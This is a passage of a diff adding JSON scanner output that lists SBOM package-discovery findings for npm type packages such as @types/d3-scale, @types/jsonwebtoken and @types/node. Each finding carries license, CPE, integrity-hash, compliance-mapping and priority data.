{ + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b363e223fe02334b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/d3-scale 4.0.9", + "title": "@types/d3-scale 4.0.9", + "description": "Package discovered: @types/d3-scale 4.0.9", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6f0b81bc9d69ce92", + "name": "@types/d3-scale", + "version": "4.0.9", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/d3-scale:\\@types\\/d3-scale:4.0.9:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3-scale:\\@types\\/d3_scale:4.0.9:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_scale:\\@types\\/d3-scale:4.0.9:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_scale:\\@types\\/d3_scale:4.0.9:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-scale:4.0.9:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_scale:4.0.9:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/d3-scale@4.0.9", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/d3-scale/-/d3-scale-4.0.9.tgz", + "integrity": "sha512-dLmtwB8zkAeO/juAMfnV+sItKjlsw2lKdZVVy6LRr0cBmegxSABiLEpGVmSJJ8O08i4+sGR6qQtb6WtuwJdvVw==", + "dependencies": { + "@types/d3-time": "*" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "22226a3e628ac76c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/d3-shape 3.1.8", + "title": "@types/d3-shape 3.1.8", + "description": "Package discovered: @types/d3-shape 3.1.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "533995aeaf2ae857", + "name": "@types/d3-shape", + "version": "3.1.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/d3-shape:\\@types\\/d3-shape:3.1.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3-shape:\\@types\\/d3_shape:3.1.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_shape:\\@types\\/d3-shape:3.1.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_shape:\\@types\\/d3_shape:3.1.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-shape:3.1.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_shape:3.1.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/d3-shape@3.1.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/d3-shape/-/d3-shape-3.1.8.tgz", + "integrity": "sha512-lae0iWfcDeR7qt7rA88BNiqdvPS5pFVPpo5OfjElwNaT2yyekbM0C9vK+yqBqEmHr6lDkRnYNoTBYlAgJa7a4w==", + "dependencies": { + "@types/d3-path": "*" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e91025b60bc33c45", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/d3-time 3.0.4", + "title": "@types/d3-time 3.0.4", + "description": "Package discovered: @types/d3-time 3.0.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d051a01827d6eb95", + "name": "@types/d3-time", + "version": "3.0.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/d3-time:\\@types\\/d3-time:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3-time:\\@types\\/d3_time:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_time:\\@types\\/d3-time:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_time:\\@types\\/d3_time:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-time:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_time:3.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/d3-time@3.0.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/d3-time/-/d3-time-3.0.4.tgz", + "integrity": "sha512-yuzZug1nkAAaBlBBikKZTgzCeA+k1uy4ZFwWANOfKw5z5LRhV0gNA7gNkKm7HoK+HRN0wX3EkxGk0fpbWhmB7g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "83378a6b374bc40d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/d3-timer 3.0.2", + "title": "@types/d3-timer 3.0.2", + "description": "Package discovered: @types/d3-timer 3.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a9187c78265f1b66", + "name": "@types/d3-timer", + "version": "3.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/d3-timer:\\@types\\/d3-timer:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3-timer:\\@types\\/d3_timer:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_timer:\\@types\\/d3-timer:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3_timer:\\@types\\/d3_timer:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3-timer:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@types\\/d3:\\@types\\/d3_timer:3.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/d3-timer@3.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/d3-timer/-/d3-timer-3.0.2.tgz", + "integrity": "sha512-Ps3T8E8dZDam6fUyNiMkekK3XUsaUEik+idO9/YjPtfj2qruF8tFBXS7XhtE4iIXBLxhmLjP3SXpLhVf21I9Lw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4a3de97ef48e263d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/jsonwebtoken 9.0.10", + "title": "@types/jsonwebtoken 9.0.10", + "description": "Package discovered: @types/jsonwebtoken 9.0.10", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bbe9092f97742247", + "name": "@types/jsonwebtoken", + "version": "9.0.10", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/jsonwebtoken:\\@types\\/jsonwebtoken:9.0.10:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/jsonwebtoken@9.0.10", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/jsonwebtoken/-/jsonwebtoken-9.0.10.tgz", + "integrity": "sha512-asx5hIG9Qmf/1oStypjanR7iKTv0gXQ1Ov/jfrX6kS/EO0OFni8orbmGCn0672NHR3kXHwpAwR+B368ZGN/2rA==", + "dependencies": { + "@types/ms": "*", + "@types/node": "*" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "be245f9788db1459", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/long 4.0.2", + "title": "@types/long 4.0.2", + "description": "Package discovered: @types/long 4.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "69a126982af5137d", + "name": "@types/long", + "version": "4.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/long:\\@types\\/long:4.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/long@4.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/long/-/long-4.0.2.tgz", + "integrity": "sha512-MqTGEo5bj5t157U6fA/BiDynNkn0YknVdh48CMPkTSpFTVmvao5UQmm7uEF6xBEo7qIMAlY/JSleYaE6VOdpaA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b5bebd78899827a5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/ms 2.1.0", + "title": "@types/ms 2.1.0", + "description": "Package discovered: @types/ms 2.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fa54533e742eac71", + "name": "@types/ms", + "version": "2.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/ms:\\@types\\/ms:2.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/ms@2.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/ms/-/ms-2.1.0.tgz", + "integrity": "sha512-GsCCIZDE/p3i96vtEqx+7dBUGXrc7zeSK3wwPHIaRThS+9OhWIXRqzs4d6k1SVU8g91DrNRWxWUGhp5KXQb2VA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "191b23786146803d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/node 20.19.39", + "title": "@types/node 20.19.39", + "description": "Package discovered: @types/node 20.19.39", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c19052194c7f9053", + "name": "@types/node", + "version": "20.19.39", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/node:\\@types\\/node:20.19.39:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/node@20.19.39", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.19.39.tgz", + "integrity": "sha512-orrrD74MBUyK8jOAD/r0+lfa1I2MO6I+vAkmAWzMYbCcgrN4lCrmK52gRFQq/JRxfYPfonkr4b0jcY7Olqdqbw==", + "dependencies": { + "undici-types": "~6.21.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9b5805676545e7d1", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @types/node 22.19.17", + "title": "@types/node 22.19.17", + "description": "Package discovered: @types/node 22.19.17", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b0b14dd646c615be", + "name": "@types/node", + "version": "22.19.17", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@types\\/node:\\@types\\/node:22.19.17:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40types/node@22.19.17", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + 